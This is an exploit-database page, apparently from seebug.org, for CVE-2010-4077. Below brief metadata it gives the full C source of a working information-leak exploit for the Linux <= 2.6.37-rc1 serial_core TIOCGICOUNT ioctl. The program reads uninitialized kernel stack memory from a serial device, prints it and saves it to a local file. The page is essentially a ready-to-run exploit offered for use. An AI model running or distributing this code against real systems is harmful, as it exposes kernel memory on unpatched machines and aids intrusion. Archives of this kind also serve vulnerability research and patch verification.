Linux <= 2.6.37-rc1 serial_core TIOCGICOUNT Leak Exploit

2014-07-0100:00:00

Root

www.seebug.org

0.0004 Low

EPSS

Percentile

12.7%

JSON

No description provided by source.


                                                /* Linux &#60;= 2.6.37-rc1 serial_core TIOCGICOUNT leak
 * ================================================ 
 * Information leak exploit for CVE-2010-4077 which
 * leaks kernel stack space back to userland due to
 * uninitialized struct member &#34;reserved&#34; in struct
 * serial_icounter_struct copied to userland. uses 
 * ioctl to trigger memory leak, dumps to file and 
 * displays to command line.
 *
 * -- prdelka
 *
 */
#include &#60;termios.h&#62;
#include &#60;fcntl.h&#62;
#include &#60;sys/ioctl.h&#62;
#include &#60;linux/serial.h&#62;
#include &#60;stdio.h&#62;
#include &#60;stdlib.h&#62;	
#include &#60;string.h&#62;

int main(int argc, char* argv[]) {
    int fd, ret = 0, i;
    struct serial_icounter_struct buffer;
    printf(&#34;[ Linux &#60;= 2.6.37-rc1 serial_core TIOCGICOUNT leak exploit\n&#34;);
    if(argc &#60; 2){
	printf(&#34;[ You need to supply a device name e.g. /dev/ttyS0\n&#34;);
	exit(-1);
    };
    memset(&buffer,0,sizeof(buffer));
    if((fd = open(argv[1], O_RDONLY)) == -1){
	printf(&#34;[ Couldn&#39;t open %s\n&#34;,argv[1]);
	exit(-1);
    }
    if((ioctl(fd, TIOCGICOUNT, &buffer)) == -1){
	printf(&#34;[ Problem with ioctl() request\n&#34;);
	exit(-1);
    }
    close(fd); 
    for(i=0;i&#60;=9;i++){
            printf(&#34;[ int leak[%d]: %x\n&#34;,i,buffer.reserved[i]);
    };
    if((fd = open(&#34;./leak&#34;, O_RDWR | O_CREAT, 0640)) == -1){
	printf(&#34;[ Can&#39;t open file to write memory out\n&#34;);
	exit(-1);
    }
    for(i=0;i&#60;=9;i++){
	    ret += write(fd,&buffer.reserved[i],sizeof(int));
    }
    close(fd);
    printf(&#34;[ Written %d leaked bytes to ./leak\n&#34;,ret);
    exit(0);
}